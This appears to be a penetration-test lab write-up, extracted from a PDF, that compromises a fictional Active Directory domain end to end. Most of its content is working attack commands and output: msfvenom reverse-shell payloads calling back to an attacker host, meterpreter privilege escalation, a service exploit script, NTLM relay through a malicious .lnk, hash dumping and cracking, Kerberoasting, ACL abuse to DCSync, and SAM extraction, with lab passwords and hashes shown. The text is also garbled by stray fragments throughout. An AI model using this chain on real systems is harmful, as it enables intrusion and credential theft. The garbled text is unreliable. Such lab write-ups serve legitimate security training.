PS C:\glassfish3\glassfish\domains\domain1\config> .\EnableAllTokenPrivs.ps1
PS C:\glassfish3\glassfish\domains\domain1\config> whoami /priv
.m

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State


============================= ============================== =======
//t

SeLoadDriverPrivilege Load and unload device drivers Enabled


SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
s:

SeCreateGlobalPrivilege Create global objects Enabled


SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
tp

Upgrading from java/meterpreter/reverse_tcp to


`windows/x64/meterpreter/reverse_tcp.
kali@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp
ht

LHOST=172.16.139.10 LPORT=1234 -f exe -o reverse.exe


[-] No platform was selected, choosing Msf::Module::Platform::Windows from
the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

s
m
Uploading payload

xa
re
be
cy
Setting up a meterpreter handler
e/

Executing reverse.exe to obtain a higher integrity meterpreter shell.


.m
//t
s:
tp
ht
s
m
xa
re
be
cy
e/
.m

As SeDebugPrivilege is enabled we can migrate to a higher-privilege process such as


winlogon.exe:
C:\glassfish3\glassfish\domains\domain1\config> wmic process where
//t

"name='winlogon.exe'" get ProcessId,Name


Name ProcessId
winlogon.exe 576
s:

winlogon.exe 5596

meterpreter > migrate 576


tp

After migration to winlogon.exe, initialize a new shell to confirm that it runs with NT
AUTHORITY\SYSTEM privileges.
ht
s
m
xa
Post-Exploitation
PS C:\users\pthorpe_adm> Get-ChildItem -Include * -File -Recurse -Force -
ErrorAction SilentlyContinue | Select-String -Pattern "WS01"

re
AppData\Roaming\Microsoft\Sticky
Notes\StickyNotes.snt:8:\pard\tx360\tx720\tx1080\tx1
440\tx1800\tx2160\tx2520\tx2880\tx3240\tx3600\tx3960\tx4320\tx4680\tx5040\tx5

be
400\tx57
60\tx6120\tx6480\tx6840\tx7200\tx7560\tx7920\tx8280\tx8640\tx9000\tx9360\tx97
20\tx100
80\tx10440\tx10800\tx11160\tx11520\f0\fs22 Test account provided by infra
cy
(172.16.139.175:WS01):\par

Downloading the StickyNotes.snt for further analysis


meterpreter > download
e/

"C:\\users\\pthorpe_adm\\AppData\\Roaming\\Microsoft\\Sticky
Notes\\StickyNotes.snt"
[*] Downloading: C:\users\pthorpe_adm\AppData\Roaming\Microsoft\Sticky
.m

Notes\StickyNotes.snt -> /home/kali/StickyNotes.snt


[*] Downloaded 9.00 KiB of 9.00 KiB (100.0%):
C:\users\pthorpe_adm\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt -
> /home/kali/StickyNotes.snt
//t

[*] Completed : C:\users\pthorpe_adm\AppData\Roaming\Microsoft\Sticky


Notes\StickyNotes.snt -> /home/kali/StickyNotes.snt
s:
tp
ht
ht
tp
s:
//t
.m
e/
cy
be
re
xa
m
s
s
m
xa
re
WS01
be
cy
Logging in using the previously obtained creds of devtest:
kali@kali:~$ xfreerdp /v:172.16.139.175 /u:devtest /p:D3vel0PEr@123
e/
.m
//t
s:
tp
ht

WonderShare service was identified as vulnerable which can be exploited to escalate


privileges using this exploit.
# Imports
import msgpackrpc
# Variables
RADDR = "172.16.139.175"
RPORT = 12345
param = "C:\\Users\\devtest\\Desktop\\reverse.exe" # msfvenom payload

# Initiate the shell

s
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
result = client.call('system_s','powershell',param)

m
kali@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp
LHOST=172.16.139.10 LPORT=1234 -f exe -o reverse.exe

xa
[-] No platform was selected, choosing Msf::Module::Platform::Windows from
the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload

re
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

be
The generated payload (reverse.exe) was uploaded to the target system using
xfreerdp, which supports file copying and pasting through RDP sessions.
cy
e/
.m
//t

Setting up a meterpreter handler


To catch the reverse shell, the port 1234 on our first victim machine, WEB-NIX01, must be
s:

forwarded to our local port 1234.


[Agent : root@WEB-NIX01] » listener_add --addr 0.0.0.0:1234 --to
127.0.0.1:1234
tp

INFO[4063] Listener 0 created on remote agent!

Executing the exploit to trigger the reverse shell:


ht

C:\Users\devtest\Desktop>"C:\Program Files\Python310\python.exe" exploit.py


s
m
xa
re
meterpreter > hashdump
be
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f280efc7d520ce6554f24f6ec
cy
ee02d0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e
0c089c0:::
devtest:1002:aad3b435b51404eeaad3b435b51404ee:0dec6c93cf0fb6306f72624ba6d92d0
e/

f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::
:
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a18c38a95955fcc6ea8c0
.m

d978bba12bc:::

Enabling RDP authentication using NTLM hash


C:\Users\Administrator\Desktop>reg add
//t

HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v
DisableRestrictedAdmin /d 0x0 /f
The operation completed successfully.
s:

Getting Administrator
tp

kali@kali:~$ xfreerdp /v:172.16.139.175 /u:Administrator


/pth:0f280efc7d520ce6554f24f6ecee02d0

Confirming Domain Membership


ht

C:\WINDOWS\system32>systeminfo | findstr /B "Domain"


Domain: trilocor.local

Using SharpHound to collect data


C:\Users\Administrator\Desktop>.\SharpHound -c All --zipfilename TRILOCOR

Using LaZagne to identify stored credentials


C:\Users\Administrator\Desktop> .\LaZagne.exe all

s
m
xa
re
be
cy
DC01
e/

Getting access as pthrope using reused credentials:


.m

# Writting to file because the password has special characters


kali@kali:~$ echo "-pl,MKO)9ijn" >> creds
kali@kali:~$ crackmapexec smb 172.16.139.3 -u 'pthorpe' -p creds
SMB 172.16.139.3 445 DC01 [*] Windows 10 / Server
2019 Build 17763 x64 (name:DC01) (domain:trilocor.local) (signing:True)
//t

(SMBv1:False)
SMB 172.16.139.3 445 DC01 [+]
trilocor.local\pthorpe:-pl,MKO)9ijn
s:

User pthorpe has READ, WRITE access to the Print_jobs share.


tp
ht
s
m
Uploading malicious .lnk file

xa
A malicious .lnk file can be uploaded to the Print_jobs share using the netexec tool
with the slinky module. When the share is accessed, it enables us to capture the NTLM
hash of the user.
kali@kali:~$ netexec smb 172.16.139.3 -u pthorpe -p creds -M slinky -o

re
SERVER=172.16.139.10 NAME=important

be
cy
e/

Starting Responder
.m
//t
s:
tp
ht
s
m
xa
re
be
cy
e/

Forwarding local port 445 on WEB-NIX01 to attacker’s machine:


[Agent : root@WEB-NIX01] » listener_add --addr 0.0.0.0:445 --to
10.10.14.4:445
.m

INFO[54769] Listener 1 created on remote agent!

After some time responder successfully captured hash of user trilocor\jflemming:


//t
s:
tp

Cracking the captured hash using hashcat with rockyou.txt wordlist:


ht

kali@kali:~$ hashcat -m 5600 hash ~/Desktop/rockyou.txt


kali@kali:~$ hashcat -m 5600 hash ~/Desktop/rockyou.txt --show
JFLEMMING::trilocor:<REDACTED>:$$Bond@007$$
s
m
xa
re
The user jflemming inherits GenericWrite permissions on the user trilocor\ksalinas

be
from HELP DESK MANAGERS group object. This allows jflemming to obtain a crackable
hash of the user ksalinas.
cy
e/

kali@kali:/opt/targetedKerberoast$ python3 targetedKerberoast.py --dc-ip


172.16.139.3 -u jflemming -p '$$Bond@007$$' -d trilocor.local --request-user
.m

KSALINAS
//t
s:

Cracking the password hash of user trilocor\ksalinas using hashcat with


tp

rockyou.txt wordlist:
kali@kali:~$ hashcat -m 13100 ksalinas_hash ~/Desktop/rockyou.txt
ht
s
m
xa
re
Enumerating ACLs as ksalinas
PS C:\Users\Administrator\Desktop> $sid = Convert-NameToSid ksalinas
PS C:\Users\Administrator\Desktop> Get-DomainObjectACL -Identity * | ?

be
{$_.SecurityIdentifier -eq $sid}

ObjectDN : CN=MSSP Connect,OU=Security


cy
Groups,OU=Corp,DC=trilocor,DC=local
ObjectSID : S-1-5-21-748909465-2105014040-255522671-1715
ActiveDirectoryRights : Self
BinaryLength : 36
e/

AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
.m

AccessMask : 8
SecurityIdentifier : S-1-5-21-748909465-2105014040-255522671-4632
AceType : AccessAllowed
AceFlags : ContainerInherit
IsInherited : False
//t

InheritanceFlags : ContainerInherit
PropagationFlags : None
AuditFlags : None
s:

In Active Directory (AD), “Self-Membership” allows a user to add themselves to a


specific security group, enabling self-management of group membership without admin
tp

intervention.
This allows us to add the user ksalinas to the MSSP Connect group, granting them all
the privileges of that group:
ht

PS C:\Users\Administrator\Desktop> $SecPassword = ConvertTo-SecureString


'atm@#5' -AsPlainText -Force
PS C:\Users\Administrator\Desktop> $Cred = New-Object
System.Management.Automation.PSCredential('trilocor.local\ksalinas',
$SecPassword)

PS C:\Users\Administrator\Desktop> Add-DomainGroupMember -Identity 'MSSP


Connect' -Members 'ksalinas' -Credential $Cred -Verbose
PS C:\Users\Administrator\Desktop> Get-DomainGroupMember -Identity "MSSP
Connect" | Select MemberName

s
m
xa
The members of the MSSP CONNECT group have the WriteOwner privilege on the TIER I
INFRASTRUCTURE group object.

re
be
cy
e/
.m

The WriteOwner permission in Active Directory (AD) allows a user to change the
ownership of an object.
//t

Change ownership of TIER I INFRASTRUCTURE to ksalinas


PS C:\Users\Administrator\Desktop> $SecPassword = ConvertTo-SecureString
'atm@#5' -AsPlainText -Force
s:

PS C:\Users\Administrator\Desktop> $Cred = New-Object


tp

PS C:\Users\Administrator\Desktop> Set-DomainObjectOwner -Credential $Cred -


Identity "TIER I INFRASTRUCTURE" -OwnerIdentity ksalinas
ht

PS C:\Users\Administrator\Desktop> Add-DomainObjectAcl -Rights 'All' -


TargetIdentity "TIER I INFRASTRUCTURE" -PrincipalIdentity "ksalinas" -
Credential $Cred -Domain trilocor.local

Adding ksalinas to TIER I INFRASTRUCTURE


PS C:\Users\Administrator\Desktop> Add-DomainGroupMember -Identity "TIER I
INFRASTRUCTURE" -Members 'ksalinas' -Credential $Cred -Verbose

PS C:\Users\Administrator\Desktop> Get-DomainGroupMember -Identity "TIER I


INFRASTRUCTURE" | Select MemberName

s
m
The members of TIER I INFRASTRUCTURE have GenericWrite on FILESHARE ADMINS

xa
group object:

re
be
cy
e/

In Active Directory, Generic Write allows modification of most object attributes,


excluding restricted ones like the Security Descriptor.
.m

Adding ksalinas to the group FILESHARE ADMINS


kali@kali:/opt/bloodyAD$ python3 bloodyAD.py --host 172.16.139.3 -u ksalinas
-p 'atm@#5' -d bloody add groupMember 'FILESHARE ADMINS' 'ksalinas'
//t

[+] ksalinas added to FILESHARE ADMINS

The user ksalinas inherits READ, WRITE on the share Department Shares from
s:

FILESHARE ADMINS group.


tp
ht
s
m
kali@kali:~/CPTS/172.16.139.3$ smbclient //172.16.139.3/'Department Shares' -
U 'ksalinas%atm@#5'

xa
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jan 16 12:54:25 2023

re
.. D 0 Tue Jan 16 12:54:25 2023
Accounting D 0 Tue Jul 26 17:37:20 2022
Executives D 0 Tue Jul 26 17:37:17 2022

be
Finance D 0 Tue Jul 26 17:37:14 2022
HR D 0 Tue Jul 26 17:37:03 2022
IT D 0 Tue Jul 26 17:37:00 2022
Marketing D 0 Tue Jul 26 17:37:10 2022
cy
R&D D 0 Tue Jul 26 17:37:07 2022
c
10328063 blocks of size 4096. 6980936 blocks available
smb: \> cd IT
e/

smb: \IT\> dir


. D 0 Tue Jul 26 17:37:00 2022
.. D 0 Tue Jul 26 17:37:00 2022
Private D 0 Tue Jul 26 17:38:30 2022
.m

Public D 0 Tue Jul 26 17:37:43 2022

10328063 blocks of size 4096. 6980936 blocks available


smb: \IT\> cd Private
//t

smb: \IT\Private\> dir


. D 0 Tue Jul 26 17:38:30 2022
.. D 0 Tue Jul 26 17:38:30 2022
s:

Audit-OktaAppPermissions.ps1 A 25836 Wed Jul 27 00:01:44 2022


AzureDBCopy.ps1 A 814 Wed Jul 27 00:01:44 2022
BulkDeleteMailbox.ps1 A 544 Wed Jul 27 00:01:44 2022
tp

CopyFileForAllUsers.ps1 A 739 Wed Jul 27 00:01:44 2022


CreateNewServerADGroups.ps1 A 644 Wed Jul 27 00:01:44 2022
GetRandomPassword.ps1 A 473 Wed Jul 27 00:01:44 2022
IsPortOpen.ps1 A 277 Wed Jul 27 00:01:44 2022
ht

IT_BACKUP02072022 D 0 Tue Jul 26 17:38:30 2022


many_to_many_MailboxFolderPermissions.ps1 A 3365 Wed Jul 27
00:01:44 2022
OneDriveSetLimit.ps1 A 2040 Wed Jul 27 00:01:44 2022
PreSysPrepClean.ps1 A 2308 Wed Jul 27 00:01:44 2022
Set-WindowsSleepSettings.ps1 A 1338 Wed Jul 27 00:01:44 2022
UserLogons.vbs A 7484 Wed Jul 27 00:01:44 2022
WhoShutItDown.ps1 A 313 Wed Jul 27 00:01:44 2022
WhyUserLockedOut.ps1 A 481 Wed Jul 27 00:01:44 2022

10328063 blocks of size 4096. 6980936 blocks available

s
smb: \IT\Private\> cd IT_BACKUP02072022
smb: \IT\Private\IT_BACKUP02072022\> dir

m
. D 0 Tue Jul 26 17:38:30 2022
.. D 0 Tue Jul 26 17:38:30 2022
Trilocor_backup_03072022.vc A 16777216 Wed Jul 27 00:01:44 2022

xa
10328063 blocks of size 4096. 6980936 blocks available
smb: \IT\Private\IT_BACKUP02072022\> exit

re
kali@kali:~/CPTS/172.16.139.3$ sudo mount -t cifs //172.16.139.3/'Department
Shares' . -o user=ksalinas
Password for ksalinas@//172.16.139.3/Department Shares:

be
kali@kali:~/CPTS/172.16.139.3/Department_Shares$ sudo cp
IT/Private/IT_BACKUP02072022/Trilocor_backup_03072022.vc ../
cy
Cracking the veracrypt vault using hashcat with rockyou.txt wordlist:
kali@kali:~/CPTS$ hashcat -m 13751 Trilocor_backup_03072022.vc
~/Desktop/rockyou.txt
e/
.m
//t
s:
tp
ht

Mounting the veracrypt vault


ht
tp
s:
//t
.m
e/
cy
be
re
xa
m
s
ht
tp
s:
//t
.m
e/
cy
be
re
xa
m
s
s
m
xa
re
be
cy
e/
.m

The volume has been mounted to our machine. We can browse the volume simply by
//t

starting File Explorer and navigating to the V:\ drive.


s:
tp
ht
s
m
xa
re
be
cy
e/
.m
//t

The psafe3 file requires a master password to be read:


s:
tp

Cracking the master password of .psafe3 file using hashcat with rockyou.txt wordlist.
ht
s
m
kali@kali:~$ hashcat -m 5200 ./trilocor_svc_vault.psafe3
~/Desktop/rockyou.txt

xa
re
be
cy
e/
.m

Using the software Password Safe, we can open the .psafe3 file containing the
password for user svc_trilocorsync:
Synchronicity_21
//t

The user svc_trilocorsync, has WriteDacl permission over the domain


TRILOCOR.LOCAL:
s:
tp
ht
s
m
xa
re
be
cy
e/

Giving svc_trilocorsync DCSync Permission


PS C:\Users\Administrator\Desktop> Set-ExecutionPolicy -Scope CurrentUser -
.m

ExecutionPolicy Unrestricted
PS C:\Users\Administrator\Desktop> Import-Module .\PowerView.ps1

PS C:\Users\Administrator\Desktop> $SecPassword = ConvertTo-SecureString


'Synchronicity_21' -AsPlainText -Force
//t

PS C:\Users\Administrator\Desktop> $Cred = New-Object


System.Management.Automation.PSCredential('trilocor.local\SVC_TRILOCORSYNC',
s:

$SecPassword)

PS C:\Users\Administrator\Desktop> Add-DomainObjectAcl -Credential $Cred -


tp

TargetIdentity "DC=TRILOCOR, DC=LOCAL" -PrincipalIdentity SVC_TRILOCORSYNC -


Rights DCSync -verbose
ht
s
m
xa
re
Dumping hashes

be
kali@kali:~$ secretsdump.py -just-dc
trilocor.local/SVC_TRILOCORSYNC@172.16.139.3
Impacket v0.11.0 - Copyright 2023 Fortra
cy
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
e/

Administrator:500:aad3b435b51404eeaad3b435b51404ee:716ee2e3322df8be443de416ca
20154f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::
:
.m

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f15e59fe4d6812b54e265d9a48354848:
::
trilocor.local\avazquez:1724:aad3b435b51404eeaad3b435b51404ee:762cbc5ea2edfca
03767427b2f2a909f:::
//t

trilocor.local\pfalcon:1725:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b132
44e7c879d8177539:::
<SNIP>
s:

DC02
tp

Enumerating DomainUsers in domain TRILOCORAI.LOCAL:


PS C:\Users\Administrator\Documents> Get-DomainUser * -Domain
ht

TRILOCORAI.LOCAL -spn | select samaccountname

samaccountname
--------------
svc_datakeeper
krbtgt

User svc_datakeeper is kerberoastable, meaning its service account can be targeted


for Kerberos ticket extraction, allowing us to retrieve its hash.

s
C:\Users\Administrator\Documents> .\Rubeus.exe kerberoast
/domain:trilocorai.local /user:svc_datakeeper /nowrap

m
xa
re
Cracking the retrieved password hash using hashcat with rockyou.txt wordlist:

be
kali@kali:~$ hashcat -m 13100 hash_svc_datakeeper ~/Desktop/rockyou.txt
kali@kali:~$ hashcat -m 13100 hash_svc_datakeeper ~/Desktop/rockyou.txt --
show
cy
e/
.m

User svc_veracrypt belongs to group BUILTIN\Event Log Readers:


//t

*Evil-WinRM* PS C:\Users\svc_datakeeper\Documents> whoami


trilocorai\svc_datakeeper
s:

*Evil-WinRM* PS C:\Users\svc_datakeeper\Documents> whoami /groups

GROUP INFORMATION
tp

-----------------

Group Name Type SID


Attributes
ht

========================================== ================ ============


==================================================
Everyone Well-known group S-1-1-0
Mandatory group, Enabled by default, Enabled group
BUILTIN\Event Log Readers Alias S-1-5-32-573
Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580
Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545
Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554

s
Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2

m
Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11
Mandatory group, Enabled by default, Enabled group

xa
NT AUTHORITY\This Organization Well-known group S-1-5-15
Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10
Mandatory group, Enabled by default, Enabled group

re
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

Searching for user passwords in event logs, I found the password of svc_veracrypt:

be
*Evil-WinRM* PS C:\Users\svc_datakeeper\Desktop> wevtutil qe Security
/rd:true /f:text | Select-String "/user"

Process Command Line: "C:\Windows\system32\net.exe" use f:


\\172.16.6.100\backups /user:svc_veracrypt Au10_B@ckuP_cRy3t
cy
User svc_veracrypt can PSRemote to DC02:
e/
.m
//t
s:

kali@kali:~$ evil-winrm -i 172.16.210.5 -u svc_veracrypt -p Au10_B@ckuP_cRy3t


tp
ht

User svc_veracrypt has SeBackupPrivilege, which means we can backup and access
any file we desire:
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State

s
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled

m
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled

xa
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Downloading the necessary files

re
kali@kali:~$ wget
https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilege
CmdLets/bin/Debug/SeBackupPrivilegeUtils.dll

be
kali@kali:~$ wget
https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilege
CmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll

Uploading to DC02
cy
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> upload
/home/kali/SeBackupPrivilegeCmdLets.dll
e/

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> upload


/home/kali/SeBackupPrivilegeUtils.dll
.m

Importing the DLLs


*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> Import-Module
.\SeBackupPrivilegeUtils.dll
//t

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> Import-Module


.\SeBackupPrivilegeCmdLets.dll
s:

Backing up flag.txt
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> Copy-FileSeBackupPrivilege
C:\Users\Administrator\Desktop\flag.txt C:\Temp\flag.txt -overwrite
tp

*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> type C:\Temp\flag.txt


ht

<SNIP>

Dumping hashes
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> cd c:\
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> mkdir Temp
Directory: C:\

Mode LastWriteTime Length Name


---- ------------- ------ ----

s
d----- 11/10/2000 10:05 PM Temp

m
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> reg save hklm\sam
c:\Temp\sam
The operation completed successfully.

xa
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> reg save hklm\system
c:\Temp\system
The operation completed successfully.

re
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> cd Temp
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> download sam

be
*Evil-WinRM* PS C:\Users\svc_veracrypt\Documents> download system

kali@kali:~$ pypykatz registry --sam sam system


<SNIP>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a678b5e7cc4c143b1d76a69ddf
cy
14c3ae:::
e/
.m
//t
s:
tp
ht

You might also like